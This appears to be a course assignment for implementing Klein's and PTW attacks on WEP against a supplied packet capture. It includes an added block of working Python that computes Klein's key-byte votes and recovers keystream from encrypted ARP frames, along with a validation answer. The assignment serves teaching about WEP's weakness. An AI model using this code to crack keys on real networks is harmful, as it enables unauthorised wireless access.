Follow the two papers listed below to implement the WEP attack on WiFi.

Breaking 104 bit WEP in less than 60 seconds

Klein’s and PTW Attacks on WEP

Implement Klein’s Attack and PTW Attack

Write Python code to implement Klein's attack. To test the code, you are provided a pcap file of sample traffic that includes a sufficient amount of ARP traffic. The targeted AP MAC address is 0c:80:63:58:c1:e5.

  • Eq (22) in the second paper is the central formula. Write a function that takes Key, i and X and calculates K[i].

    To validate your function: when Key = b'\x05\xf5\x03', i = 3 and X = [214, 122, 22], the result should be 234.

  • Find all packets sent from the targeted AP with a length of 36 bytes (ARP packets). Since we know the original data known_data = [ 0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x01 ], we can get X by xor(known_data, wepdata). Read section 5 of the first paper.

  • Key is the IV concatenated with the cracked key bytes.

  • For each captured ARP packet, generate a vote for a key byte. Read the last three paragraphs of section 4 of the second paper.
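The two functions below are an added example, not part of the assignment text or either paper's code: one implements Klein's key-byte formula (as restated in the Tews/Weinmann/Pyshkin paper) using the RC4 key-scheduling state, the other recovers the keystream bytes from a WEP-encrypted ARP frame using the known LLC/SNAP + ARP prefix. Function names are my own; the formula assumes the keystream is indexed from X[0] and that the first secret key byte is K[3], which is what the validation vector on this page implies.

```python
# Added example: Klein's key-byte formula and known-plaintext keystream
# recovery for WEP. Names are hypothetical; the formula is Klein's as
# restated in Tews/Weinmann/Pyshkin (not code from the assignment).

# First 16 plaintext bytes of every WEP-encrypted ARP frame (LLC/SNAP
# header followed by the start of the ARP header), taken from the page.
KNOWN_DATA = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06,
                    0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x01])


def rc4_ksa_partial(key, steps):
    """Run the first `steps` iterations of the RC4 key-scheduling algorithm.

    Returns (S, j) after processing i = 0 .. steps-1, i.e. the permutation
    S_steps and the index j_steps that Klein's formula needs.
    """
    key = bytes(key)
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S, j


def klein_key_byte(key, i, X):
    """Klein's candidate (one vote) for key byte K[i].

    key : key bytes known so far (the 3-byte IV plus any already recovered
          bytes); only key[0..i-1] are used.
    i   : index of the key byte being guessed (3 for the first secret byte).
    X   : keystream bytes; the formula consumes X[i-1].

    Candidate: K[i] = S_i^{-1}[i - X[i-1]] - (j_i + S_i[i])  (mod 256)
    """
    if len(key) < i:
        raise ValueError("need at least i known key bytes")
    S, j = rc4_ksa_partial(key, i)
    target = (i - X[i - 1]) % 256
    s_inverse = S.index(target)      # S is a permutation, so index() is S^-1
    return (s_inverse - (j + S[i])) % 256


def keystream_from_arp(wepdata, known=KNOWN_DATA):
    """Recover the first len(known) keystream bytes of a WEP-encrypted ARP
    frame by XORing the ciphertext body (w.wepdata) with the known prefix."""
    return [c ^ k for c, k in zip(wepdata, known)]


if __name__ == "__main__":
    # Validation vector from the assignment: expect 234.
    print(klein_key_byte(b'\x05\xf5\x03', 3, [214, 122, 22]))
```

Each captured ARP frame yields one call to `keystream_from_arp` followed by one `klein_key_byte` candidate, which is the per-packet vote the assignment asks for; the correct byte wins because Klein's formula is right with probability about 1.36/256 instead of the 1/256 a random guess would give, which is exactly why WEP falls to a modest amount of captured traffic and must not be deployed.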

Useful Python Tips:

  • For an ARP packet encrypted with WEP, the size is 36 bytes. You can extract the WEP layer by calling getlayer(Dot11WEP) (scapy). Once you have the WEP layer (say w), the IV is w.iv and the data is w.wepdata.
  • Convert an int array to byte array: bytearray(int_array)
  • Convert a string to byte array: bytearray("string","utf-8")
  • Xor operation on two numbers: n1 ^ n2